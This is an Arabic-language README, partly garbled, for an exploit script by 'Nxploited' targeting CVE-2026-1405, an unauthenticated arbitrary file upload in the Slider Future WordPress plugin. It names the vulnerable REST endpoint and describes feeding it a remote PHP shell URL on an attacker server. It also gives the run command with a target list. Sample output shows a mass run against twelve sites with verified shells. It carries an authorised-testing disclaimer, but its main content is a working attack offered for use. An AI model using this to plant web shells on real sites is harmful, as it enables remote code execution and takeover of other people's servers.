
Slider Future <= 1.0.5 - رفع ملف تعسفي بدون مصادقة
Slider Future <= 1.0.5 - رفع ملفات عشوائية بدون مصادقة
المكوّن: Slider Future (إضافة ووردبريس)
الإصدارات المتأثرة: ≤ 1.0.5
الثغرة: رفع ملفات عشوائية بدون مصادقة
CVE: CVE-2026-1405
درجة CVSS: 9.8 (حرجة)
إضافة Slider Future لووردبريس عرضة لرفع ملفات عشوائية بسبب غياب التحقق من نوع الملف في الدالة slider_future_handle_image_upload في جميع الإصدارات حتى 1.0.5 ضمناً. يتيح ذلك للمهاجمين غير المصادق عليهم رفع أي نوع من الملفات—بما في ذلك قذائف PHP الخبيثة—مباشرة إلى الخادم المتأثر، مما يتيح تنفيذ الأكواد عن بُعد.
/wp-json/slider-future/v1/upload-image/image_url (بدون الحاجة إلى مصادقة).http://example1.com
https://example2.com
...
مثال: http://yourserver.com/shell.php
python3 CVE-2026-1405.py
سيُطلب منك:
list.txt)Nxploited)success_results.txt./wp-json/slider-future/v1/upload-image/image_url يشير إلى قذيفتك.هذه الأداة مخصصة لأغراض التعليم واختبار الأمان المصرح به فقط.
الاستخدام غير المصرح به ضد مواقع لا تملكها أو ليس لديك إذن صريح لاختبارها يعد غير قانوني.
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt